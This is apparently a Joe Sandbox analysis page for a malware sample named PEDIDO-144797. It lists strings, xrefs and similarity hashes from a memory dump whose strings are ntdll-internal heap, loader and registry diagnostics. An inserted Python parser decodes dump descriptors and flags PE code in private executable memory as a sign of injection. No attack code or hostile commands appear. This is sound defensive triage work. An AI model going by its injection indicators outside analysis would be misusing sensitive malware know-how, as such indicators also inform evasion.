                                                                                                                                          • String ID: LUg2$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                          • API String ID: 0-2262592636
                                                                                                                                          • Opcode ID: 811f98e129aef2ec98d3af934af814cbdac802e930d204954c715ef9b207636c
                                                                                                                                          • Instruction ID: e9fe1fa27ba0529401d90d445668551ecd4317f394c97729eb6876ca0da2e1d2
                                                                                                                                          • Opcode Fuzzy Hash: 811f98e129aef2ec98d3af934af814cbdac802e930d204954c715ef9b207636c
                                                                                                                                          • Instruction Fuzzy Hash: 7D91CCB5A14359CFEB15CFA4D4607AEB7B1FF11368F148199E800AB290DB789E84CF91
                                                                                                                                          Strings
                                                                                                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 32700EB5
                                                                                                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 32700E2F
                                                                                                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 32700E72
                                                                                                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 32700DEC
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                          • API String ID: 0-1468400865
                                                                                                                                          • Opcode ID: 7f5df920ec1b6e09469d97616ecc7d2ad24c8fc42d86d971373f71406c1b85ce
                                                                                                                                          • Instruction ID: d8d2b5d378269b9bb636bb8b743a4ae3055c8ce6f1a73397ec3fdd59a899f21b
                                                                                                                                          • Opcode Fuzzy Hash: 7f5df920ec1b6e09469d97616ecc7d2ad24c8fc42d86d971373f71406c1b85ce
                                                                                                                                          • Instruction Fuzzy Hash: BC71E0B1904304AFDB50CF14C884B8B7BE9EF857A4F404468FD498B28AD775E988CBD2
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                          • API String ID: 2994545307-1391187441
                                                                                                                                          • Opcode ID: dc35b24f823e04223f004fc9a5fdccc2ca94a27e8479ebe7741f5efe35caeac5
                                                                                                                                          • Instruction ID: 116f5cfc60ec47f3506f53e7f313231edd69178f198c9cd082f2cf1febc33eef
                                                                                                                                          • Opcode Fuzzy Hash: dc35b24f823e04223f004fc9a5fdccc2ca94a27e8479ebe7741f5efe35caeac5
                                                                                                                                          • Instruction Fuzzy Hash: 5F31A136911208EFDB11CB54DC88FDAB7B9FF89770F1440A9E825A7291DB71E940CE61
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$em2
                                                                                                                                          • API String ID: 0-4201897154
                                                                                                                                          • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                          • Instruction ID: 3216496c3e9694c588491e65a7344d9ce0e116d776f835d34565bee0cc384b7e
                                                                                                                                          • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                          • Instruction Fuzzy Hash: CD31D172901209BFDB11CB94CD40EDEBBB9EF84754F004025F916A72A0EB70DE45DB94
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                          • Opcode ID: a707d2e1079f4584ce5d82c9af7019bb0c09d1b577a863031934c154e0b4d9a3
                                                                                                                                          • Instruction ID: 17565448029cdeab02245b87e438bbc42d2d3e15bf07b54549fc424835f230de
                                                                                                                                          • Opcode Fuzzy Hash: a707d2e1079f4584ce5d82c9af7019bb0c09d1b577a863031934c154e0b4d9a3
                                                                                                                                          • Instruction Fuzzy Hash: 4151F1B4A00715EFEB0ADF64C864BADB7F1BF44755F108169E4029B290DBB49D15CF81
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                           • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                                                          • API String ID: 0-1168191160
                                                                                                                                          • Opcode ID: f0c6641b916d0ec077d7448c41d61a4e4f7948b45dfcc865ac833f351398c08e
                                                                                                                                          • Instruction ID: eda6b7b10094f68cc1a73ce84803f531199a42b028c2b61a659a58dde39cb5de
                                                                                                                                          • Opcode Fuzzy Hash: f0c6641b916d0ec077d7448c41d61a4e4f7948b45dfcc865ac833f351398c08e
                                                                                                                                          • Instruction Fuzzy Hash: 4CF181B5A022298BDB32CF14CC80BD9B3B5BF44754F4840D9DA09AB242DB759E85CFD9
                                                                                                                                          Strings
                                                                                                                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 326A1648
                                                                                                                                          • HEAP: , xrefs: 326A14B6
                                                                                                                                          • HEAP[%wZ]: , xrefs: 326A1632
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                           • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                          • API String ID: 0-3178619729
                                                                                                                                          • Opcode ID: e019d185bd2892f12cc8cbb39bcef037bc8d3e79f9c02676af30ec27d2667191
                                                                                                                                          • Instruction ID: 7ea1f524d6fdca042e4169497fc24e060ea1ef3de3e672e93ff32b52a3a9bf0a
                                                                                                                                          • Opcode Fuzzy Hash: e019d185bd2892f12cc8cbb39bcef037bc8d3e79f9c02676af30ec27d2667191
                                                                                                                                          • Instruction Fuzzy Hash: 95E1E2B4A043459FEB19CF68C4607BABBF5EF48704F14889DE896CB285EB34E941CB50
                                                                                                                                          Strings
                                                                                                                                          • RTL: Re-Waiting, xrefs: 32710128
                                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 327100C7
                                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 327100F1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                           • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                          • API String ID: 0-2474120054
                                                                                                                                          • Opcode ID: a1ede004cbb0bdab92b16ee1bc93a57fd032c45d5c610d58ce241175ab304fed
                                                                                                                                          • Instruction ID: c66ae16e0b5803a907a6bed389edbb422fd01b57c2a82ae7ac848e359cd4f94e
                                                                                                                                          • Opcode Fuzzy Hash: a1ede004cbb0bdab92b16ee1bc93a57fd032c45d5c610d58ce241175ab304fed
                                                                                                                                          • Instruction Fuzzy Hash: 4CE1DF74608741DFE715DF28C880B0AB7E5FF84368F200A1AF9A58B2E0DB74E945CB42
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                           • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                          • API String ID: 0-2391371766
                                                                                                                                          • Opcode ID: 4ffe81898fda75c8f4f4264c8096a39ffb36577a048343bfbf4dcb816f773a9b
                                                                                                                                          • Instruction ID: 61ceff91a13b53c618a5d405132510e07d75147c5681aa26b29798b8a11b8dfb
                                                                                                                                          • Opcode Fuzzy Hash: 4ffe81898fda75c8f4f4264c8096a39ffb36577a048343bfbf4dcb816f773a9b
                                                                                                                                          • Instruction Fuzzy Hash: A1B1AAB2605345AFE311CF54C980F6BB7E9BF48754F400929FA41AB290DBB0E949CB96
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                           • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                          • API String ID: 0-2779062949
                                                                                                                                          • Opcode ID: a56469d19f25f09cbbecc7e7ab957ee0bbd3c65104ba1adac7de822691e3b355
                                                                                                                                          • Instruction ID: 1debd9fd2c262c261d77b14594c4e4cf08e5754f66cc86c108422e7a0b954961
                                                                                                                                          • Opcode Fuzzy Hash: a56469d19f25f09cbbecc7e7ab957ee0bbd3c65104ba1adac7de822691e3b355
                                                                                                                                          • Instruction Fuzzy Hash: 07A19D75901269ABDF21DF24CC88BDAB3B8EF08714F1005EAE909A7250DB769EC5CF54
                                                                                                                                          Strings
                                                                                                                                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3277B3AA
                                                                                                                                          • TargetNtPath, xrefs: 3277B3AF
                                                                                                                                          • GlobalizationUserSettings, xrefs: 3277B3B4
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                           • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                          • API String ID: 0-505981995
                                                                                                                                          • Opcode ID: c792f80d76de275bd38c27e01dc9959239ba0528334a08c3541f6b68b71af7cb
                                                                                                                                          • Instruction ID: 7b0735f80ba546e26d8549e561515b09db7cbf3d91124dfe12ff39da87c30ba5
                                                                                                                                          • Opcode Fuzzy Hash: c792f80d76de275bd38c27e01dc9959239ba0528334a08c3541f6b68b71af7cb
                                                                                                                                          • Instruction Fuzzy Hash: BC618C72941228ABDB21DF58DC98BEAB7B9FF14714F4101E5E908AB250CB74DE84CF94
                                                                                                                                          Strings
                                                                                                                                          • HEAP: , xrefs: 326FE442
                                                                                                                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 326FE455
                                                                                                                                          • HEAP[%wZ]: , xrefs: 326FE435
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                           • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                          • API String ID: 0-1340214556
                                                                                                                                          • Opcode ID: 8e2fc2d87aa3236dcd6b93055bb06d9f10f5fb68304056c254279c3264519cd1
                                                                                                                                          • Instruction ID: bc038c00efb02b309a0828b255c4dad2466e62d6564bbba17eb62e8d2414bcd3
                                                                                                                                          • Opcode Fuzzy Hash: 8e2fc2d87aa3236dcd6b93055bb06d9f10f5fb68304056c254279c3264519cd1
                                                                                                                                          • Instruction Fuzzy Hash: ED514736604784FFEB06CBA8C984F9ABBF8FF05744F0440A5E9508B292DBB5E941CB51
                                                                                                                                          Strings
                                                                                                                                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3274D7B2
                                                                                                                                          • HEAP: , xrefs: 3274D79F
                                                                                                                                          • HEAP[%wZ]: , xrefs: 3274D792
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                           • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                                          • API String ID: 0-3815128232
                                                                                                                                          • Opcode ID: 683692848ec5ffc02ffb4f63fb9927771230083e934d83e8f0ef11e073a9e7ea
                                                                                                                                          • Instruction ID: 5a4bfefd17d4c14341ef65cdaf5f4e1160c6f1040ed88b68fd765bba1d8fdfc8
                                                                                                                                          • Opcode Fuzzy Hash: 683692848ec5ffc02ffb4f63fb9927771230083e934d83e8f0ef11e073a9e7ea
                                                                                                                                          • Instruction Fuzzy Hash: 8B5100791003518EF366CA29C854B7273E2FF46388F52488EE8D58F681EE76D847DB21
                                                                                                                                          Strings
                                                                                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 326AA21B
                                                                                                                                          • @Sg2, xrefs: 326AA268
                                                                                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 326AA229
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                           • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @Sg2$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                          • API String ID: 0-3100920191
                                                                                                                                          • Opcode ID: d26100c3d3d98e413c6be0d3fe5a75b0bdbbd7344643c91584f129743338d6a2
                                                                                                                                          • Instruction ID: ec4192dc52fd9ac249995c00c157969330a578a0657901fd98a487bcadcfa7b3
                                                                                                                                          • Opcode Fuzzy Hash: d26100c3d3d98e413c6be0d3fe5a75b0bdbbd7344643c91584f129743338d6a2
                                                                                                                                          • Instruction Fuzzy Hash: 54419BB5A00784DBEB05CF99C8A0B5977B5FF85744F2480A6EC10AB2A1EB76DD50CB11
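The records above are a flat text dump of Joe Sandbox's per-function metadata: the strings a function references with their xref addresses, the memory dump the function was disassembled from, and the opcode/instruction identifiers used for similarity matching. The Python below is an added example, not Joe Sandbox code and not part of this report. It parses records in this layout into structured data, strips the "Download File" link text the report viewer glues onto associated dump names, decodes the .sdmp descriptor into a base address and the PAGE_*/MEM_* values the region had when dumped (0x40 = PAGE_EXECUTE_READWRITE, 0x1000 = MEM_COMMIT, 0x20000 = MEM_PRIVATE), and flags PE-shaped code that lives in private read-write-execute memory, which a normally loaded module (MEM_IMAGE) never does. The meaning assigned to the three leading .sdmp name fields is an assumption; the sample records are constructed copies of two records on this page.

```python
"""Parse Joe Sandbox per-function records (Strings / Memory Dump Source / Similarity
blocks) and decode the .sdmp descriptor.  Added example, not Joe Sandbox tooling.
SAMPLE is a constructed copy of two records in this page's layout.  The meaning of
the three leading .sdmp name fields is an assumption; PAGE_*/MEM_* are Win32 values."""
import re
from dataclasses import dataclass, field
from typing import Optional

SAMPLE = r"""
Strings
• HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 326A1648
• HEAP: , xrefs: 326A14B6
• HEAP[%wZ]: , xrefs: 326A1632
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
Similarity
• API ID:
• String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
• Opcode ID: e019d185bd2892f12cc8cbb39bcef037bc8d3e79f9c02676af30ec27d2667191
Strings
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
Similarity
• String ID: @$DelegatedNtdll$\SystemRoot\system32\
• Opcode ID: 4ffe81898fda75c8f4f4264c8096a39ffb36577a048343bfbf4dcb816f773a9b
"""

PAGE_PROTECT = {0x1: "PAGE_NOACCESS", 0x2: "PAGE_READONLY", 0x4: "PAGE_READWRITE", 0x8: "PAGE_WRITECOPY",
                0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
                0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
HEADERS = ("Strings", "APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")

@dataclass
class DumpDescriptor:
    ids: tuple            # assumed: process index, dump type, dump id (kept opaque)
    base: int             # region base address (hex; equals the record's "Offset:")
    protect: int          # PAGE_* protection at dump time
    state: int            # MEM_COMMIT / MEM_RESERVE
    mem_type: int         # MEM_PRIVATE / MEM_MAPPED / MEM_IMAGE

    @classmethod
    def parse(cls, name: str) -> "DumpDescriptor":
        # "Download File" is link text the report viewer appends to associated dump names
        parts = name.strip().removesuffix("Download File").removesuffix(".sdmp").split(".")
        if len(parts) != 8:
            raise ValueError(f"unexpected .sdmp name: {name!r}")
        return cls(tuple(parts[:3]), *(int(x, 16) for x in parts[3:7]))

    def describe(self) -> str:
        return (f"{self.base:#x} {PAGE_PROTECT.get(self.protect, hex(self.protect))} "
                f"{MEM_STATE.get(self.state, hex(self.state))} {MEM_TYPE.get(self.mem_type, hex(self.mem_type))}")

@dataclass
class FunctionRecord:
    strings: list = field(default_factory=list)   # (text, xref address) pairs
    source: Optional[DumpDescriptor] = None
    pe_based: bool = False
    associated: list = field(default_factory=list)
    ids: dict = field(default_factory=dict)       # Opcode ID, fuzzy hashes, String ID, ...

    def is_runtime_written_pe(self) -> bool:
        """PE content in committed, private, writable+executable memory: a normally loaded
        module is MEM_IMAGE, so this code was written into the process at run time
        (injected or manually mapped) and is where triage should focus."""
        d = self.source
        return (d is not None and self.pe_based and d.mem_type == 0x20000
                and d.state == 0x1000 and d.protect in (0x40, 0x80))

XREF_RE = re.compile(r"^• (?P<text>.*), xrefs: (?P<addr>[0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(r"^• Source File: (?P<name>\S+\.sdmp), Offset: [0-9A-Fa-f]+, based on PE: (?P<pe>true|false)$")
FIELD_RE = re.compile(r"^• (?P<key>[^:]+): ?(?P<val>.*)$")

def parse_records(text: str) -> list:
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in ("Strings", "APIs"):           # every record opens with one of these
            cur = FunctionRecord()
            records.append(cur)
        if line in HEADERS:
            section = line
            continue
        if cur is None:
            continue
        if section in ("Strings", "APIs"):        # only xref lines carry data here
            m = XREF_RE.match(line)
            if m:
                cur.strings.append((m["text"], int(m["addr"], 16)))
            continue
        m = SOURCE_RE.match(line)
        if m:
            cur.source = DumpDescriptor.parse(m["name"])
            cur.pe_based = m["pe"] == "true"
            continue
        m = FIELD_RE.match(line)
        if m and m["key"] == "Associated":
            cur.associated.append(DumpDescriptor.parse(m["val"]))
        elif m:
            cur.ids[m["key"]] = m["val"]
    return records

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.source.describe(), "runtime-written PE:", rec.is_runtime_written_pe())
        for text, addr in rec.strings:
            print(f"  {addr:#x}  {text!r}")
```

Run against the records on this page, every function resolves to the same dump: a PE-shaped region at 0x32670000 that is committed, private and PAGE_EXECUTE_READWRITE, whose strings (HEAP: ..., RTL: Enter CriticalSection Timeout ..., LdrpResSearchResourceHandle, DelegatedNtdll, \SystemRoot\system32\) are ntdll-internal diagnostics. The descriptor therefore points at a copy of ntdll code sitting in private RWX memory, not at the loaded ntdll image, which is the region to dump and diff against the on-disk ntdll when triaging this sample.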
                                                                                                                                          Strings
                                                                                                                                          • GlobalFlag, xrefs: 3272B30F
                                                                                                                                          • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3272B2B2
                                                                                                                                          • @, xrefs: 3272B2F0
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                          • API String ID: 0-4192008846
                                                                                                                                          • Opcode ID: cb216f4ab5526001fa97af9523e48d9c1fcf6e8c9531b6251581d836ebe92bf5
                                                                                                                                          • Instruction ID: 6551387f1fde145a1e5bab793cfc91da7520ecc13f76df55848e4c61ef5fdc03
                                                                                                                                          • Opcode Fuzzy Hash: cb216f4ab5526001fa97af9523e48d9c1fcf6e8c9531b6251581d836ebe92bf5
                                                                                                                                          • Instruction Fuzzy Hash: 7C315CB1E00209AFDB10DF94DD84BEEBBBDFF44744F401469E605AB141DBB49E049B94
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @$@
                                                                                                                                          • API String ID: 0-149943524
                                                                                                                                          • Opcode ID: 914c5caff4ac6f4d54f7ba16cb8f15f6f8f72fed1c8ed7dd663492ed86e02180
                                                                                                                                          • Instruction ID: 6c5a783e62b267513e1370aa5f618588431e947b38b3884532ffb999a7d38a0f
                                                                                                                                          • Opcode Fuzzy Hash: 914c5caff4ac6f4d54f7ba16cb8f15f6f8f72fed1c8ed7dd663492ed86e02180
                                                                                                                                          • Instruction Fuzzy Hash: 0F32A1B55083518BDB24CF16C4A07AFB7E2FF88748F50892EF9859B290EB74D944CB52
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                          • Opcode ID: b88ac8f9ef9fc0ddc5f7ea4c5c7514c1403fd67f42f2f80063501b1ab59095f7
                                                                                                                                          • Instruction ID: 9997f7f752dcdfd9b7b0fd469a8d9a44ab8bb3b9974fbc713a441cc9fbc80d75
                                                                                                                                          • Opcode Fuzzy Hash: b88ac8f9ef9fc0ddc5f7ea4c5c7514c1403fd67f42f2f80063501b1ab59095f7
                                                                                                                                          • Instruction Fuzzy Hash: C2319275601B12EFEB4ADB68C960B8AFBB6BF44754F105115E90147A60DBB0EC21CFD4
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
